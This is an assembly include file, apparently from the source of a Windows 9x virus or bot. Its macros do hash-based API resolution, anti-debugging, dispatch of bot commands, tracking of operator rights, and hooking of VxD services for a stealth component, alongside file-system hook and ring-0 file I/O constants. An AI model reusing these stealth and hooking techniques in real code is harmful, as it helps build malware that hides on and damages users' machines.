ERROR_ALREADY_EXISTS 	equ	183
SYNCHRONIZE		equ	100000h
KEY_QUERY_VALUE		equ	1
KEY_SET_VALUE		equ	2
HKEY_LOCAL_MACHINE	equ	80000002h
HKEY_CURRENT_USER	equ	80000001h
REG_SZ			equ	1
WAIT_TIMEOUT		equ 	103h
HEAP_ZERO_MEMORY	equ	8
SOCK_STREAM		equ	1
AF_INET			equ	2
HOSTENT_IP		equ	12
CRLF_HEX		equ	0a0dh
WSAEWOULDBLOCK		equ	1035
LOCALE_SYSTEM_DEFAULT	equ	800h
NORM_IGNORECASE		equ	1
EWX_REBOOT		equ	2
EWX_FORCE		equ	4
IPPROTO_TCP		equ	6
SO_REUSEADDR		equ	4
SOL_SOCKET		equ	0000FFFFh
STARTF_USESHOWWINDOW	equ	256
STARTF_USESTDHANDLES	equ	1
STILL_ACTIVE		equ	103h
CREATE_NEW_CONSOLE	equ	16
WM_CLOSE		equ	16
SW_HIDE			equ	0
WM_QUIT			equ	012h
SW_NORMAL		equ	1
SW_MAXIMIZE		equ	3
SW_MINIMIZE		equ	6
INTERNET_OPEN_TYPE_DIRECT	equ	1
PROCESS_TERMINATE	equ	1
PCL_NONE		equ	0
WM_QUIT			equ	12h
ERROR_NO_MORE_ITEMS	equ	259
ERROR_BADKEY		equ	1010
ERROR_FILE_NOT_FOUND	equ	2
VMM_DEVICE_ID		equ	1
PAGESWAP_DEVICE_ID	equ	7

MAX_OPERZ_ALLOWED	equ	5

; ---------------------------------------------------------------------------
; RITES = 8 bitova
;
;  S               A   B   M   G
; [7] [6] [5] [4] [3] [2] [1] [0]
; G -> Guest bit
; M -> Maintance bit
; B -> Boss bit
; A -> Admin bit
;
;
; S -> Super-admin bit
; ---------------------------------------------------------------------------

RITES	record	{
		RITES_Guest			:1 = 0
		RITES_Maintance			:1 = 0
		RITES_Boss			:1 = 0
		RITES_Admin			:1 = 0
		RITES_UNDEFINED			:1 = 0
		RITES_UNDEFINED_2		:1 = 0
		RITES_UNDEFINED_3		:1 = 0
		RITES_SuperAdmin		:1 = 0
		}

operator struc
	OP_Name		DB 	10 dup (0)				; max 9 + NULL
	OP_TimeLoggedIn	DD	0
	OP_TimeLastCmd	DD	0
	OP_Rites	RITES	{}
operator ends

dll_record struc
	Dll_Imagebase	DD			?
	Hash_table	DD 	DWORD	PTR	?
	Address_table	DD 	DWORD	PTR	?
	Api_number	DB			?
dll_record ends

bpice			equ	<db	0f1h>				; BPICE opcode
rdtsc			equ	<db	0fh, 31h>			; RDTCS opcode
salc			equ	<db	0D6h>				; SALC opcode

jecxnz	macro	p1, p2							; jecxnz emulation
	errifnb <p2> "too much arguments in macro jecxnz"
	db	041h, 0e2h, p1-$-1
	endm

invoke	macro api
		extrn api:proc
		call	api
	endm

@endspc	macro
	local	@l
@l:	lodsb
	cmp	al, ' '
	jne	@l
endm

@endcr macro
	local @2
@2:	lodsb
	cmp	al, CR
	jnz	@2
endm

@dvotocka macro
	local	@1
@1:	lodsb
	cmp	al, ":"
	jnz	@1
endm

@usklicnik macro
	local	@1
@1:	lodsb
	cmp	al, "!"
	jnz	@1
endm

@pushvar macro	variable, empty
		local	next_instr, size_id
		errifnb <empty> "too much arguments in macro @pushvar"
		call next_instr
		size_id:
			variable
		SizePushed = $-size_id
	next_instr:
	endm

DLL_INIT macro dll, dummy
		errifnb <dummy> "too much arguments in macro DLL_INIT"
		&dll dll_record <0, offset hash_table_&dll, offset address_table_&dll, No_api_&dll>
	endm

;calculates stringz hash and stores them as dd

whash	macro	p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11
		errifnb <p11> "too much arguments in macro whash"
		irp k, <p1, p2, p3, p4, p5, p6, p7, p8, p9, p10>
			ifnb <k>
				hash = 0
				irpc c, <k>
					hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
					hash = hash xor "&c"
				endm
				dd	hash
			else
				exitm
			endif
		endm
	endm

gethash	macro	p1, p2
		errifnb <p2> "too much arguments in macro gethash"
		hash = 0
		irpc c, <p1>
			hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
			hash = hash xor "&c"
		endm
	endm

callg	macro p1, p2
		errifnb <p2> "too much arguments in macro callg"
		call	_&p1 G
	endm

callb	macro p1, p2
		errifnb <p2> "too much arguments in macro callb"
		call	_&p1 X
	endm

@retecx1 macro p1
		errifnb <p1> "too much arguments in macro @retecx1"
		push	1
		pop	ecx
		ret
	endm

BUILD_DISPATCH_TABLE	macro p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11
				local char_numba
				errifnb <p11> "too much arguments in macro BUILD_DISPATCH_TABLE"
				irp k, <p1, p2, p3, p4, p5, p6, p7, p8, p9, p10>
					ifnb <k>
						char_numba=0
						irpc c, <k>
							char_numba=char_numba+1
						endm
						db	 char_numba+1, "!"
						irp	c, <k>
							db	"&c"
						endm
						dd	offset bot_cmd_&&k
					else
						exitm
					endif
				endm
			endm

PATCH_API	macro p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11
			errifnb <p11> "too much arguments in macro PATCH_API"
			irp api, <p1, p2, p3, p4, p5, p6, p7, p8, p9, p10
				ifnb <api>
					push	(_&&api G).dword ptr 0
					pop	(_dd_&&api G).dword ptr 0
				else
					exitm
				endif
			endm
		endm			

HOOK_SERVICE	macro service, dummy
			errifnb	<dummy> "too much arguments in macro HOOK_SERVICE"
			mov	ebx, service
			lea	esi, hook&service-stealthcode_start[eax]
			push	esi
			pop	(@&service-stealthcode_start[eax]).dword ptr 0
			call	hook_service
			mov	real&service-stealthcode_start[eax], esi
		endm

GetVxDServiceOrdinal	macro	reg, service
			mov	reg, (1 shl 16) or service
			endm

VxDcall                 macro   VxD, Service
                        db      0CDh
                        db      020h
                        dw      Service
                        dw      VxD
                        endm

VMMcall                 macro   Service
                        VxDcall VMM, Service
                        endm


VMM                     equ     0001h
Get_Config_Directory    equ     00B7h
Out_Debug_String        equ     00C2h
Get_System_Time         equ     003Fh
GetDDBList              equ     013Fh
PageQuery               equ     0134h
PageAllocate            equ     0053h
PageFree                equ     0055h
PAGEZEROINIT            equ     00000001h
PAGEFIXED               equ     00000008h
PG_SYS                  equ     1
PG_VM                   equ     0
PageModifyPermissions   equ     0133h
GetVxDName              equ     017Eh
PC_WRITEABLE            equ     00020000H
PC_USER                 equ     00040000H
PC_STATIC               equ     20000000H
Call_When_Idle          equ     003Ah
Cancel_Call_When_Idle   equ     012Bh
Get_System_Time         equ     003Fh
Hook_Device_Service     equ     0090h
Hook_DS			equ	Hook_Device_Service
Install_IO_Handler      equ     0096h
Get_DDB                 equ     0146h
IFSMGR                  equ     0040h
Get_Drive_Info          equ     0034h
Ring0GetDriveInfo       equ     0035h
InstallFileSystemApiHook equ    0067h
GetHeap                 equ     000Dh
UniToBCSPath            equ     0041h
IFSFN_OPEN              equ     36
IFSFN_RENAME            equ     37
IFSFN_FILEATTRIB        equ     33
IFSFN_FINDOPEN          equ     2Ch     ; open an LFN file search
FSFN_FCNNEXT            equ     03h     ; Find Next Change Notify
IFSFN_FINDNEXT          equ     02h     ; LFN handle sed baFind Next
Ring0_FileIO            equ     0032h
R0_OPENCREATFILE        equ     0D500h  ; Open/Create a file
R0_OPENCREAT_IN_CONTEXT equ     0D501h  ; Open/Create file in current context
R0_READFILE             equ     0D600h  ; Read a file, no context
R0_WRITEFILE            equ     0D601h  ; Write to a file, no context
R0_READFILE_IN_CONTEXT  equ     0D602h  ; Read a file, in thread context
R0_WRITEFILE_IN_CONTEXT equ     0D603h  ; Write to a file, in thread context
R0_CLOSEFILE            equ     0D700h  ; Close a file
R0_GETFILESIZE          equ     0D800h  ; Get size of a file
R0_FINDFIRSTFILE        equ     04E00h  ; Do a LFN FindFirst operation
R0_FINDNEXTFILE         equ     04F00h  ; Do a LFN FindNext operation
R0_FINDCLOSEFILE        equ     0DC00h  ; Do a LFN FindClose operation
R0_FILEATTRIBUTES       equ     04300h  ; Get/Set Attributes of a file
GET_ATTRIBUTES          equ     00h
SET_ATTRIBUTES          equ     01h
R0_RENAMEFILE           equ     05600h  ; Rename a file
R0_DELETEFILE           equ     04100h  ; Delete a file
R0_LOCKFILE             equ     05C00h  ; Lock/Unlock a region in a file
R0_GETDISKFREESPACE     equ     03600h  ; Get disk free space
R0_READABSOLUTEDISK     equ     0DD00h  ; Absolute disk read
R0_WRITEABSOLUTEDISK    equ     0DE00h  ; Absolute disk write
VXDLDR                  equ     0027h
GetDeviceList           equ     0005h
Begin_Critical_Section  equ     001Fh
End_Critical_Section    equ     0020h
Call_When_Idle          equ     003Ah
Call_When_Not_Critical  equ     0024h
Cancel_Call_When_Idle   equ     012Bh
Call_When_Task_Switched               equ     002Ah
Cancel_Call_When_Task_Switched        equ     012Ch

_RegOpenKey		equ	148h
_RegCloseKey		equ	149h
_RegCreateKey		equ	14ah
_RegDeleteKey		equ	14bh
_RegEnumKey		equ	14ch
_RegQueryValue		equ	14dh
_RegSetValue		equ	14eh
_RegDeleteValue		equ	14fh
_RegEnumValue		equ	150h
_RegQueryValueEx	equ	151h
_RegSetValueEx		equ	152h
_RegFlushKey		equ	155h
_RegQueryInfoKey	equ	15eh
_RegRemapPreDefKey	equ	171h
_RegCreateDynKey	equ	176h
_RegQMulti		equ	177h

sockaddr_in	struc
	sin_family	DW	?
	sin_port	DW	?
	sin_addr	DD	?
	sin_zero	DB	8 dup (?)
sockaddr_in	ends

hostent		struc
	h_name		DD	?
	h_alias		DD	?
	h_addr		DW	?
	h_len		DW	?
	h_list		DD	?
hostent		ends

timeval		struc
	tv_sec		DD	?
	tv_usec		DD	?
timeval		ends

fd_set		struc
	fd_count	DD	?
	fd_array	DD	?
fd_set		ends

ifs_onstack_struc       struc
                        dd      ? ; return address
                        dd      ? ; the address of the FSD function that is to be called for this API
_function               dd      ? ; the function that is being performed
_drive                  dd      ? ; the 1-based drive the operation is being performed on (-1 if UNC)
                        dd      ? ; the kind of resource the operation is being performed on
_codepage               dd      ? ; the codepage that the user string was passed in on
_ioreq_ptr              dd      ? ; pointer to IOREQ structure
                        ends

ioreq_struc             struc
ir_length               dd      ?            ; length of user buffer (eCX)
ir_flags                db      ?            ; misc. status flags (AL)
ir_user                 db      ?            ; user ID for this request
ir_sfn                  dw      ?            ; System File Number of file handle
ir_pid                  dd      ?            ; process ID of requesting task
ir_ppath                dd      ?            ; unicode pathname
ir_aux1                 dd      ?            ; secondary user data buffer (CurDTA)
ir_data                 dd      ?            ; ptr to user data buffer (DS:eDX)
ir_options              dw      ?            ; request handling options
ir_error                dw      ?            ; error code (0 if OK)
ir_rh                   dd      ?            ; resource handle
ir_fh                   dd      ?            ; file (or find) handle
ir_pos                  dd      ?            ; file position for request
ir_aux2                 dd      ?            ; misc. extra API parameters
ir_aux3                 dd      ?            ; misc. extra API parameters
ir_pev                  dd      ?            ; ptr to IFSMgr event for async requests
ir_fsd                  db      16 dup (?)   ; Provider work space
                        ends

; The th32ProcessID argument is only used if TH32CS_SNAPHEAPLIST or
; TH32CS_SNAPMODULE is specified. th32ProcessID == 0 means the current
; process.
;
; NOTE that all of the snapshots are global except for the heap and module
;	lists which are process specific. To enumerate the heap or module
;	state for all WIN32 processes call with TH32CS_SNAPALL and the
;	current process. Then for each process in the TH32CS_SNAPPROCESS
;	list that isn't the current process, do a call with just
;	TH32CS_SNAPHEAPLIST and/or TH32CS_SNAPMODULE.
;
; dwFlags

TH32CS_SNAPHEAPLIST	equ	1
TH32CS_SNAPPROCESS	equ	2
TH32CS_SNAPTHREAD   	equ	4
TH32CS_SNAPMODULE	equ	8
TH32CS_SNAPALL		equ	(TH32CS_SNAPHEAPLIST | TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD | TH32CS_SNAPMODULE)
TH32CS_INHERIT		equ	80000000h

;***** Process walking *************************************************

PROCESSENTRY32	struc
	dwSize			DD	?
	cntUsage		DD	?
	th32ProcessID		DD	?				; this process
	th32DefaultHeapID	DD	?
	th32ModuleID		DD	?				; associated exe
	cntThreads		DD	?
	th32ParentProcessID	DD	?				; this process's parent process
	pcPriClassBase		DD	?				; base priority of process's threads
	dwFlags			DD	?
	szExeFile		DB	MAX_PATH DUP (?)		; path
PROCESSENTRY32	ends

STARTUPINFO struc
	SI_cb			DD	?
	SI_lpReserved		DD	?
	SI_lpDesktop		DD	?
    	SI_lpTitle			DD	?
    	SI_dwX			DD	?
    	SI_dwY			DD	?
    	SI_dwXSize			DD	?
    	SI_dwYSize			DD	?
    	SI_dwXCountChars		DD	?
    	SI_dwYCountChars		DD	?
    	SI_dwFillAttribute		DD	?
    	SI_dwFlags			DD	?
    	SI_wShowWindow		DD	?
    	SI_cbReserved2		DD	?
    	SI_lpReserved2		DD	?
    	SI_hStdInput		DD	?
    	SI_hStdOutput		DD	?
    	SI_hStdError		DD	?
STARTUPINFO ends